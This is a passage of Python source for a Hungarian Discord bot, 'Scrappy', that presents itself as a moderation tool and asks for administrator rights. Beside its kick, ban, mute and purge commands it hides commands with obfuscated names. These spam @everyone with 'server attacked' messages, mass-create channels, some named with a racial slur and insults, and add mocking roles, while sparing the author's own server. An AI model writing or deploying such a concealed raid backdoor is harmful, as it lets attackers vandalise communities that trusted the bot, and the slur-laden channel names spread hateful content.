        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
    else:
        if ctx.guild.name == "Scrappy | OFFICIAL":
            embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
            embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
            await ctx.send(embed=embed)
            return

@bot.command(pass_context=True)
async def vttf783ghv(ctx):
    await ctx.message.delete()
    guild = ctx.message.guild
    if not ctx.guild.name == "Scrappy | OFFICIAL":
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
    else:
        if ctx.guild.name == "Scrappy | OFFICIAL":
            embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
            embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
            await ctx.send(embed=embed)
            return

@bot.command(pass_context = True)
async def rszám(ctx):
    embed=discord.Embed(title="Scrappy | s!rszám", description="A  Rendszer Generál Egy Számot 1 és 1000 Között", color=discord.Colour.green())
    embed.add_field(name="Szám", value=(random.randint(1,1000)), inline=False)
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
   
 
@bot.command(pass_context=True)
async def uzhgt518ghv(ctx):
    await ctx.message.delete()
    if not ctx.guild.name == "Scrappy | OFFICIAL":
        guild = ctx.guild
        await guild.create_role(name="beszoptad :C")
        await guild.create_role(name="cumi :C")
    else:
        if ctx.guild.name == "Scrappy | OFFICIAL":
            embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
            embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
            await ctx.send(embed=embed)
            return


@bot.command()
@commands.has_permissions(kick_members=True)
async def kidob(ctx, member:discord.Member = None):
    await ctx.message.delete()
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    await member.kick()
    embed=discord.Embed(title="Scrappy | skick", description="✅ Az említett játékos kilett dobva a szerverről", color=discord.Colour.green())
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
    
@kidob.error
async def kidob_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( s!kidob )", color=discord.Colour.red())
        embed.add_field(name="Szükséges Jog:", value="Kick Members / Játékosok Kidobása", inline=False)
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
 
@bot.command()
@commands.has_permissions(ban_members=True)
async def kitilt(ctx, member:discord.Member = None):
    await ctx.message.delete()
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    await member.ban()
    embed=discord.Embed(title="Scrappy | sban", description="✅ Az említett játékos kilett tiltva a szerverről", color=discord.Colour.green())
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)

@kitilt.error
async def kitilt_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( s!kitilt )", color=discord.Colour.red())
        embed.add_field(name="Szükséges Jog:", value="Ban Members / Játékosok Kitiltása", inline=False)
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
 
@bot.command()
@commands.has_permissions(mute_members=True)
async def némit(ctx, member: discord.Member=None):
    await ctx.message.delete()
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    role = discord.utils.get(ctx.guild.roles, name="Muted" or "Némitva")
    await member.add_roles(role)
    
@némit.error
async def némit_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( s!némit )", color=discord.Colour.red())
        embed.add_field(name="Szükséges Jog:", value="Mute Members / Játékosok Némitása", inline=False)
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
 
 
@bot.command()
@commands.has_permissions(administrator=True)
async def nfelold(ctx, member: discord.Member=None):
    await ctx.message.delete()
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    role = discord.utils.get(ctx.guild.roles, name="Muted" or "Némitva")
    await member.remove_roles(role)

@bot.command()
@commands.has_permissions(administrator=True)
async def figyelmeztet(ctx, member: discord.Member=None):
    await ctx.message.delete()
    username = ctx.message.author.name
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    role = discord.utils.get(ctx.guild.roles, name="Figyelmeztetett")
    await member.add_roles(role)
    embed=discord.Embed(title="Scrappy | s!figyelmeztet", description="Sikeres Müvelet", color=discord.Colour.red())
    embed.add_field(name="Felhasználó:", value=(member))
    embed.add_field(name="Figyelmeztette:", value=(username))
    embed.add_field(name="Büntetés:", value='Figyelmeztett Rang')
    embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
    embed.set_author("▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
    await ctx.send(embed=embed)

@figyelmeztet.error
async def figyelmeztet_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( s!figyelmeztet )", color=discord.Colour.red())
        embed.add_field(name="Szükséges Jog:", value="Administrator", inline=False)
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)

@nfelold.error
async def nfelold_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( s!nfelold )", color=discord.Colour.red())
        embed.add_field(name="Szükséges Jog:", value="Administrator", inline=False)
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)

@bot.command()
@commands.has_permissions(send_messages=True)
async def hirdetés(ctx, arg):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | Üzenet", description='▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬', color=discord.Colour.blue())  
    embed.add_field(name="Üzenet:", value=(arg)) 
    embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
    await ctx.send(embed=embed)

    await ctx.message.add_reaction('✅')

@bot.command()
async def szavazás(ctx, arg):
    await ctx.message.delete()
    embed = discord.Embed(title="**Scrappy | Szavazás**", description='▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬', color=discord.Colour.blue())  
    embed.add_field(name="Szavazás:", value=(arg)) 
    embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
    await ctx.send(embed=embed)
    await ctx.add_reaction('✅')
    await ctx.add_reaction('❌')

@bot.command()
async def felépités(ctx):
    if get(ctx.guild.roles, name="Figyelmeztetett"):
      embed=discord.Embed(title="Hiba Történt.", description="❌ Nemsikerült a felépités!", color=discord.Colour.red())
      embed.add_field(name="Indok:", value="Már Létezik ( Figyelmeztetett ) Rang", inline=False)
      embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
      embed.set_author(name="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
      await ctx.send(embed=embed)
    else:
        await guild.create_role(name="Figyelmeztetett")


@felépités.error
async def felépités_error(ctx, error):
    await ctx.message.delete()
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ A Bot Feltelepitéséhez Adminisztrációs Jog Szükséges!", color=discord.Colour.red())
        embed.add_field(name="Szükséges Jog:", value="Administrator", inline=False)
        embed.add_field(name="Ehez:", value="s!felépit", inline=False)
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)

@bot.command()
async def segitség(ctx):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | Segitség", description="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬", color=discord.Colour.blue())
    
    embed.set_author(name=ctx.message.author, icon_url=ctx.message.author.avatar_url)

    embed.add_field(name="Bot Felépitése::", value="s!felépités", inline=False)

    embed.add_field(name="A Bot Prefixe:", value="s!", inline=False)

    embed.add_field(name="Alap Parancsok:", value="info, segitség, hirdetés <Üzenet>, töröl <mennyiség>", inline=False)
    embed.add_field(name="Fun Parancsok:", value="rszám ( RandomSzám )", inline=False)
    embed.add_field(name="Zene Parancsok:", value="Hamarosan", inline=False)
    embed.add_field(name="Moderációs Parancsok:", value="kitilt, kidob, figyelmeztet, némit, nfelold", inline=False)
    embed.add_field(name="Figyelmeztet Parancs:", value="Feltelepitésnél Scrappy Létrehoz egy ( Figyelmeztetett ) Rangot, Ezt a rangot tetszőlegesen állithatod be, akár egy két jog elvonásával ( ugye ezzel adva értelmet a rangnak )", inline=False)
    embed.add_field(name="Miért is van szüksége a botnak adminisztrációs jogra?", value="Mivel e jog nélkül, a moderációs parancsok és még néhány parancs hibásan fog müködni..", inline=False)
    embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
    await ctx.send(embed=embed)

@bot.command()
@commands.has_permissions(manage_messages=True)
async def töröl(ctx,arg, amount=100,):
    await ctx.message.delete()
    channel = ctx.message.channel
    messages = []
    async for message in channel.history(limit=amount):
              messages.append(message)
    await channel.delete_messages(messages)
    embed = discord.Embed(title="Scrappy | Törlés", description=" ✅  Üzenetek törölve.", color=discord.Colour.green())
    embed.add_field(name="Törölt Üzenetek:", value=(arg), inline=False)
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
    return

@töröl.error
async def töröl_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        await ctx.message.delete()
